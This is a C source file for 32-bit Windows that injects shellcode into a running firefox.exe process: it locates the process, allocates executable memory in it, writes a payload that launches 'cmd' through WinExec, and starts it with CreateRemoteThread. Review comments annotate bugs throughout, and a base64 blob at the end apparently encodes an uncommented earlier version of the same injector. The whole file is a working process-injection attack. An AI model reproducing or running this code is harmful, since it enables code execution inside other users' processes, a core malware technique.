#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <string.h>
/*
 * Payload template, 32-bit x86 only: it carries two 4-byte absolute
 * address immediates.  PrepareShellcode() overwrites the immediate at
 * offsets 13..16 with the address of WinExec and the one at 23..26 with
 * the address of ExitProcess, so whatever is baked into those slots here
 * (0x779A2C41 and 0) is never used as-is.
 *
 * Offsets in the comments count from shellcode[0].  sizeof(shellcode) is
 * 30: 29 payload bytes plus the string literal's trailing NUL, which the
 * rest of the file copies along with the payload.
 */
unsigned char shellcode[] = "\x8B\xDC"  /* 0-1 */
"\x68\x63\x6D\x64\x20"                  /* 2-6: opcode 0x68 followed by the ASCII bytes "cmd " */
"\x8B\xC4"                              /* 7-8 */
"\x6A\x01"                              /* 9-10 */
"\x50"                                  /* 11 */
"\xB8\x41\x2C\x9A\x77"                  /* 12-16: 0xB8 + imm32; imm32 at 13 is patched with &WinExec */
"\xFF\xD0"                              /* 17-18 */
"\x8B\xE3"                              /* 19-20 */
"\x5A"                                  /* 21 */
"\xB8\x00\x00\x00\x00"                  /* 22-26: 0xB8 + imm32; imm32 at 23 is patched with &ExitProcess */
"\xFF\xD0";                             /* 27-28; shellcode[29] is the literal's NUL */
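/*
 * Resolve WinExec and ExitProcess in this process's kernel32 and write their
 * addresses into the two imm32 slots of shellcode[] (offsets 13 and 23), then
 * mark the array's page executable.
 *
 * Reports nothing: a failed GetModuleHandle/GetProcAddress leaves a zero in
 * the slot, and a failed VirtualProtect is not detected.  NOTE(review): the
 * caller has no way to tell whether preparation succeeded.
 *
 * The payload encodes 4-byte absolute addresses, so this only makes sense in
 * a 32-bit build; on Win64 the pointer-to-DWORD conversion would silently
 * truncate, hence the build-time guard.
 */
void PrepareShellcode(void)
{
#ifdef _WIN64
#error "shellcode[] carries 32-bit immediates; build this file as x86 (32-bit)"
#endif
	HMODULE hKernel32;
	DWORD WinExecAddr;
	DWORD ExitProcessAddr;
	DWORD oldProtect;

	hKernel32 = GetModuleHandle(TEXT("Kernel32"));
	/* FARPROC -> ULONG_PTR -> DWORD is the documented Win32 way to turn a
	   function pointer into an integer; no truncation in a 32-bit build. */
	WinExecAddr = (DWORD)(ULONG_PTR)GetProcAddress(hKernel32, "WinExec");
	ExitProcessAddr = (DWORD)(ULONG_PTR)GetProcAddress(hKernel32, "ExitProcess");

	/* memcpy instead of *(DWORD *)(shellcode + 13) = ...: the slots are not
	   4-byte aligned and the cast breaks strict aliasing (undefined
	   behaviour), even though x86 happens to tolerate the access. */
	memcpy(shellcode + 13, &WinExecAddr, sizeof WinExecAddr);
	memcpy(shellcode + 23, &ExitProcessAddr, sizeof ExitProcessAddr);

	/* Return value deliberately not acted on, matching the original contract. */
	VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
}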
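/*
 * Return the process ID of the first running process whose image name
 * equals lpProcess, or 0 when no such process exists or the process
 * snapshot could not be taken.
 *
 * lpProcess: executable name as it appears in PROCESSENTRY32.szExeFile,
 *            e.g. TEXT("foo.exe"); compared with lstrcmp, so the match is
 *            case-sensitive.  Must not be NULL.
 *
 * The snapshot handle is closed on every path once it was obtained; it is
 * never passed to CloseHandle when CreateToolhelp32Snapshot failed.
 * Process32First's result is checked before the entry is read, because the
 * entry is undefined when the call fails.
 */
DWORD GetPID(LPTSTR lpProcess)
{
	PROCESSENTRY32 pe32;
	HANDLE snapshot;
	DWORD ProcessID = 0;

	snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (snapshot == INVALID_HANDLE_VALUE)
	{
		return 0;
	}

	RtlZeroMemory(&pe32, sizeof pe32);
	pe32.dwSize = sizeof pe32;  /* Process32First rejects an entry without dwSize set */
	if (Process32First(snapshot, &pe32))
	{
		do
		{
			if (lstrcmp(pe32.szExeFile, lpProcess) == 0)
			{
				ProcessID = pe32.th32ProcessID;
				break;
			}
		} while (Process32Next(snapshot, &pe32));
	}

	CloseHandle(snapshot);
	return ProcessID;
}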
/*
 * Copy shellcode[] into the address space of hProcess and start a thread on
 * it.  The caller owns hProcess; this function creates and closes its own
 * thread handle.  There is no return value, so the caller cannot observe
 * failure; the only diagnostic is a printf to stdout.
 *
 * hProcess: process handle opened with rights sufficient for VirtualAllocEx,
 *           WriteProcessMemory and CreateRemoteThread (main() below passes
 *           one opened with PROCESS_ALL_ACCESS).
 *
 * NOTE(review): main() may pass NULL here, because OpenProcess returns NULL
 * on failure while main() only compares against INVALID_HANDLE_VALUE.
 */
void Inject(HANDLE hProcess)
{
/* Base of the remote allocation; stays NULL until VirtualAllocEx succeeds. */
PVOID pRemoteShellcode = NULL;
HANDLE hRemoteThread = NULL;
DWORD dwRemoteThreadID = 0;
/* Presumably meant to receive the remote thread's exit code; see the note
   in the failure branch below — it is never written. */
DWORD dwInjectStatus = 0;
/* Patches the two address slots and makes the local copy executable. */
PrepareShellcode();
__try
{
/* 30 bytes: 29 payload bytes plus the string literal's trailing NUL. */
int size = sizeof(shellcode);
pRemoteShellcode = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pRemoteShellcode == NULL)
{
/* SEH: returning from inside __try still runs __finally, which then calls
   VirtualFreeEx with pRemoteShellcode == NULL. */
return;
}
/* NOTE(review): return value and bytes-written count are not checked, so a
   failed or short write goes unnoticed. */
WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, size, NULL);
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, &dwRemoteThreadID);
if (hRemoteThread == NULL)
{
/* DWORD is unsigned long on Windows; "%x" formally expects unsigned int
   (same width on Win32, so it works in practice). */
printf("CreateRemoteThread failed. Last error: %x\n", GetLastError
()); __leave;
/* NOTE(review): the two statements below follow __leave inside the
   failure branch and are therefore never executed; as a result
   dwInjectStatus is never updated. */
WaitForSingleObject(hRemoteThread, INFINITE);
GetExitCodeThread(hRemoteThread, &dwInjectStatus);
}
}
__finally
{
/* dwInjectStatus is always 0 when this runs (see above), so the cleanup
   below executes unconditionally: the remote allocation is released and
   the thread handle closed whether or not CreateRemoteThread succeeded. */
if (!dwInjectStatus)
{
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread);
}
}
}
}
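/*
 * Entry point: look up the process named by the hard-coded target string,
 * open it and hand the handle to Inject().
 *
 * GetPID() returns 0 when the name is not found; that case is reported and
 * the program exits rather than calling OpenProcess with PID 0.  OpenProcess
 * returns NULL on failure (it never returns INVALID_HANDLE_VALUE), so the
 * handle is tested against NULL; this keeps a NULL handle from reaching
 * Inject().
 *
 * Return value: 0 in every case, so callers relying on the exit status see
 * no change; failures are reported on stdout.
 */
int main(void)
{
	DWORD ProcessID;
	HANDLE hProcess;

	ProcessID = GetPID(TEXT("firefox.exe"));
	if (ProcessID == 0)
	{
		printf("Target process not found\n");
		return 0;
	}

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
	if (hProcess == NULL)
	{
		/* DWORD is unsigned long on Windows, hence %lx. */
		printf("OpenProcess failed. Last error: %lx\n", GetLastError());
		return 0;
	}

	Inject(hProcess);
	CloseHandle(hProcess);
	return 0;
}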
I2luY2x1ZGUgPFdpbmRvd3MuaD4KI2luY2x1ZGUgPFRsSGVscDMyLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9ICJceDhCXHhEQyIKIlx4NjhceDYzXHg2RFx4NjRceDIwIgoiXHg4Qlx4QzQiCiJceDZBXHgwMSIKIlx4NTAiCiJceEI4XHg0MVx4MkNceDlBXHg3NyIKIlx4RkZceEQwIgoiXHg4Qlx4RTMiCiJceDVBIgoiXHhCOFx4MDBceDAwXHgwMFx4MDAiCiJceEZGXHhEMCI7Cgp2b2lkIFByZXBhcmVTaGVsbGNvZGUodm9pZCkKewoJdW5zaWduZWQgbG9uZyBLZXJuZWxBZGRyOwoJdW5zaWduZWQgbG9uZyBXaW5FeGVjQWRkcjsKCXVuc2lnbmVkIGxvbmcgRXhpdFByb2Nlc3NBZGRyOwoJRFdPUkQgb2xkUHJvdGVjdDsKCglLZXJuZWxBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0TW9kdWxlSGFuZGxlKFRFWFQoIktlcm5lbDMyIikpOwoJV2luRXhlY0FkZHIgPSAodW5zaWduZWQgbG9uZylHZXRQcm9jQWRkcmVzcygoSE1PRFVMRSlLZXJuZWxBZGRyLCAiV2luRXhlYyIpOwoJRXhpdFByb2Nlc3NBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0UHJvY0FkZHJlc3MoKEhNT0RVTEUpS2VybmVsQWRkciwgIkV4aXRQcm9jZXNzIik7CgoJKihEV09SRCAqKShzaGVsbGNvZGUgKyAxMykgPSBXaW5FeGVjQWRkcjsKCSooRFdPUkQgKikoc2hlbGxjb2RlICsgMjMpID0gRXhpdFByb2Nlc3NBZGRyOwoKCVZpcnR1YWxQcm90ZWN0KHNoZWxsY29kZSwgc2l6ZW9mKHNoZWxsY29kZSksIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUsICZvbGRQcm90ZWN0KTsKfQoKRFdPUkQgR2V0UElEKExQVFNUUiBscFByb2Nlc3MpCnsKCVBST0NFU1NFTlRSWTMyIHBlMzI7CglIQU5ETEUgc25hcHNob3QgPSBOVUxMOwoJSEFORExFIGhQcm9jZXNzID0gTlVMTDsKCURXT1JEIFByb2Nlc3NJRCA9IDA7CgoJaWYgKChzbmFwc2hvdCA9IENyZWF0ZVRvb2xoZWxwMzJTbmFwc2hvdChUSDMyQ1NfU05BUFBST0NFU1MsIDApKSAhPSBJTlZBTElEX0hBTkRMRV9WQUxVRSkKCXsKCQlSdGxaZXJvTWVtb3J5KCZwZTMyLCBzaXplb2YoUFJPQ0VTU0VOVFJZMzIpKTsKCQlwZTMyLmR3U2l6ZSA9IHNpemVvZihQUk9DRVNTRU5UUlkzMik7CgkJUHJvY2VzczMyRmlyc3Qoc25hcHNob3QsICZwZTMyKTsKCQlkbwoJCXsKCQkJaWYgKGxzdHJjbXAocGUzMi5zekV4ZUZpbGUsIGxwUHJvY2VzcykgPT0gMCkKCQkJewoJCQkJUHJvY2Vzc0lEID0gcGUzMi50aDMyUHJvY2Vzc0lEOwoJCQkJYnJlYWs7CgkJCX0KCQl9IHdoaWxlIChQcm9jZXNzMzJOZXh0KHNuYXBzaG90LCAmcGUzMikpOwoJfQoJCQoJQ2xvc2VIYW5kbGUoc25hcHNob3QpOwoJcmV0dXJuIFByb2Nlc3NJRDsKfQoKdm9pZCBJbmplY3QoSEFORExFIGhQcm9jZXNzKQp7CglQVk9JRAlwUmVtb3RlU2hlbGxjb2RlID0gTlVMTDsKCUhBTkRMRQloUmVtb3RlVGhyZWFkID0gTlVMTDsKCURXT1JECWR3UmVtb3RlVGhyZWFkSUQgPSAwOwoJRFdPUkQJZHdJbmplY3RTdGF0dXMgPSAwOwoKCVByZXBhcmVT
aGVsbGNvZGUoKTsKCQoJX190cnkKCXsKCQlpbnQgc2l6ZSA9IHNpemVvZihzaGVsbGNvZGUpOwoKCQlwUmVtb3RlU2hlbGxjb2RlID0gVmlydHVhbEFsbG9jRXgoaFByb2Nlc3MsIE5VTEwsIHNpemUsIE1FTV9DT01NSVQsIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUpOwoJCWlmIChwUmVtb3RlU2hlbGxjb2RlID09IE5VTEwpCgkJewoJCQlyZXR1cm47CgkJfQoKCQlXcml0ZVByb2Nlc3NNZW1vcnkoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIHNoZWxsY29kZSwgc2l6ZSwgTlVMTCk7CgoJCWhSZW1vdGVUaHJlYWQgPSBDcmVhdGVSZW1vdGVUaHJlYWQoaFByb2Nlc3MsIE5VTEwsIDAsIChMUFRIUkVBRF9TVEFSVF9ST1VUSU5FKXBSZW1vdGVTaGVsbGNvZGUsIE5VTEwsIDAsICZkd1JlbW90ZVRocmVhZElEKTsKCQlpZiAoaFJlbW90ZVRocmVhZCA9PSBOVUxMKQoJCXsKCQkJcHJpbnRmKCJDcmVhdGVSZW1vdGVUaHJlYWQgZmFpbGVkLiBMYXN0IGVycm9yOiAleFxuIiwgR2V0TGFzdEVycm9yKCkpOwoJCQlfX2xlYXZlOwoKCQkJV2FpdEZvclNpbmdsZU9iamVjdChoUmVtb3RlVGhyZWFkLCBJTkZJTklURSk7CgkJCUdldEV4aXRDb2RlVGhyZWFkKGhSZW1vdGVUaHJlYWQsICZkd0luamVjdFN0YXR1cyk7CgkJfQoJfQoJX19maW5hbGx5Cgl7CgkJaWYgKCFkd0luamVjdFN0YXR1cykKCQl7CgkJCXByaW50ZigiSW5qZWN0aW9uIGZhaWxlZFxuIik7CgkJCVZpcnR1YWxGcmVlRXgoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIDAsIE1FTV9SRUxFQVNFKTsKCgkJCWlmIChoUmVtb3RlVGhyZWFkICE9IE5VTEwpCgkJCXsKCQkJCUNsb3NlSGFuZGxlKGhSZW1vdGVUaHJlYWQpOwoJCQl9CgkJfQoJfQp9CgppbnQgbWFpbigpCnsKCURXT1JEIFByb2Nlc3NJRDsKCUhBTkRMRSBoUHJvY2VzczsKCglQcm9jZXNzSUQgPSBHZXRQSUQoVEVYVCgiZmlyZWZveC5leGUiKSk7CgloUHJvY2VzcyA9IE9wZW5Qcm9jZXNzKFBST0NFU1NfQUxMX0FDQ0VTUywgRkFMU0UsIFByb2Nlc3NJRCk7CgoJaWYgKGhQcm9jZXNzICE9IElOVkFMSURfSEFORExFX1ZBTFVFKQoJewoJCUluamVjdChoUHJvY2Vzcyk7CgkJQ2xvc2VIYW5kbGUoaFByb2Nlc3MpOwoJfQoJcmV0dXJuIDA7Cn0=